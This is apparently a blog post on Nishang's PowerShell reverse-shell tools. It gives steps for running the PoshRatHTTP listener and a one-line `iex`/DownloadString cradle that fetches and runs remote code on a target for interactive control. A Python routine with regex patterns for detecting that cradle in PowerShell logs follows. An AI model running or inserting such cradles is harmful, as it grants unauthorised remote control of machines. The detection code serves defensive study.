Day 1 – Interactive PowerShell shells over TCP
Day 2 – Interactive PowerShell shells over UDP
Day 3 – Interactive PowerShell shells over HTTP/HTTPS
Day 4 – Interactive PowerShell shells with WMI
Day 5 – Interactive PowerShell shells over ICMP and DNS
Nikhil is the author of the offensive-security PowerShell tools Nishang and Kautilya, and his blog post series is ideal if you want to roll up your sleeves and play with these tools manually rather than as part of a framework. I find this strategy helps me see under the hood and really get to grips with the code itself.
Download PoshRatHTTP.ps1 onto your server and be sure to adjust your execution policy in an elevated PowerShell console to allow script execution.
Change line 12 of the script:
$Server = '127.0.0.1'
to the IP address of your "listening" machine.
Run the script. It starts an HTTP listener that serves the client code to the target when the target connects.
Next, make the connection from the target machine in PowerShell:
iex (New-Object Net.WebClient).DownloadString("http://server/connect")
And you have interactive PowerShell control.
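As an added example (not from the original post and not part of Nishang), here is the defender's view of the one-liner above: a small Python triage routine that flags the Invoke-Expression plus WebClient.DownloadString download cradle in PowerShell script block text, such as the ScriptBlockText field of event 4104 in the Microsoft-Windows-PowerShell/Operational log once script block logging is enabled. The script blocks below are constructed samples, and the input shape (script text already extracted from the event) is an assumption.

```python
import re

# Constructed sample ScriptBlockText values (assumed already extracted
# from event 4104). Index 0 is the cradle shown in the post.
SAMPLE_SCRIPT_BLOCKS = [
    r'iex (New-Object Net.WebClient).DownloadString("http://server/connect")',
    r"Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/connect')",
    r'$wc = New-Object Net.WebClient; $wc.DownloadString("http://192.0.2.10/update.txt") | Out-File C:\Temp\out.txt',
    r'Get-ChildItem C:\Users | Where-Object { $_.Name -like "a*" }',
]

# Two signals taken from the cradle on this page: remote text is fetched
# with DownloadString, and it is handed to Invoke-Expression (alias iex).
EXEC_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
FETCH_RE = re.compile(r"\.downloadstring\s*\(", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)


def classify(script_block: str) -> dict:
    """Return a verdict for one script block plus any URLs it contacts."""
    text = " ".join(script_block.split())  # collapse newlines and spacing
    fetches = FETCH_RE.search(text) is not None
    executes = EXEC_RE.search(text) is not None
    if fetches and executes:
        verdict = "cradle"    # remote code fetched and run in memory
    elif fetches:
        verdict = "download"  # fetch without in-memory execution: review
    else:
        verdict = "benign"
    return {"verdict": verdict, "urls": URL_RE.findall(text)}


def triage(script_blocks):
    """Return (index, verdict, urls) for every block that is not benign."""
    hits = []
    for index, block in enumerate(script_blocks):
        result = classify(block)
        if result["verdict"] != "benign":
            hits.append((index, result["verdict"], result["urls"]))
    return hits


if __name__ == "__main__":
    for index, verdict, urls in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {index}: {verdict} {urls}")
```

The "cradle" verdict is the one to alert on; a "download" alone is noisy in most environments and is better used as context for a hunt than as an alert.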
There are other ways to deliver the code to the target that I haven't investigated yet. There is also an HTTPS version that allows for encrypted communication, changes firewall rules and even adds a security certificate!
I'd encourage you to hop over to Nikhil's blog post series, where there are instructions, images and videos.
Enjoy. I am.